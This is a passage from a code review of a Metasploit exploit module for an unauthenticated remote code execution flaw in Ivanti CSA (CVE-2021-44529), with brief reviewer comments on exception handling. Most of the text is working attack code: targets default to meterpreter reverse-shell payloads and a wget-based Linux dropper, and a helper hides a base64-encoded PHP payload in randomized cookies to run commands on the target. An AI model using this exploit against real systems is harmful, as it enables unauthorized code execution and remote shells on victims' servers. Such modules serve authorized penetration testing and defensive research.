modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb

```diff
@@ -0,0 +1,175 @@
+          [ 'EDB', '50833'],
+          [ 'PACKETSTORM', '166383']
+        ],
+        'DisclosureDate' => '2021-12-02',
+        'Platform' => ['unix', 'linux', 'php'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_PHP],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_http'
+              }
+            }
+          ],
+          [
+            'PHP Command',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_http'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def randomize_cookie(payload)
+    # randomize the cookie in terms cookie pairs "name=value"
+    # Number of cookie pairss should be at least 4, and the first cookie pair should be always name='ab'
+    # and the cookie number matching  no_of_cookies-2 should contain the payload
+    # example 1: Cookie: sG34st=ab;g3sBdnn=<PAYLOAD>;h4hYyeEe=;j7sJJjjs=;
+    # example 2: Cookie: dvDfR6F=ab;bxvGE=;Fs=<PAYLOAD>;uEn44Nkk=;nnXk=;
+    no_of_cookies = rand(4..8)
+    cookie_name = Rex::Text.rand_text_alphanumeric(1..8)
+    random_cookie = "#{cookie_name}=ab;"
+    for cookie_no in 2..no_of_cookies do
+      cookie_name = Rex::Text.rand_text_alphanumeric(1..8)
+      if cookie_no == no_of_cookies - 2
+        random_cookie << "#{cookie_name}=#{payload};"
+      else
+        random_cookie << "#{cookie_name}=;"
+      end
+    end
+    # print_status("cookie: #{random_cookie}")
+    return random_cookie
+  end
+
+  def check_vuln
+    # check RCE by grabbing CSA version banner stored on /etc/LDBUILD
+    payload = Base64.strict_encode64('system("cat /etc/LDBUILD");')
+    cookie_payload = randomize_cookie(payload)
+
+    return send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'client', 'index.php'),
+      'cookie' => cookie_payload.to_s
+    })
+  rescue StandardError => e
```

Comment:
Rescuing StandardError here vs rescuing connection specific exceptions that could be thrown by `send_request_cgi`, which is the more appropriate approach here.

Reply:
We discussed this in the previous submission, and reading your comments then, my understanding that your are fine with this test. Please correct my understanding if this is not the case and propose a rescue test that works for you and the team.

Reply:
Fair point, marking this as resolved.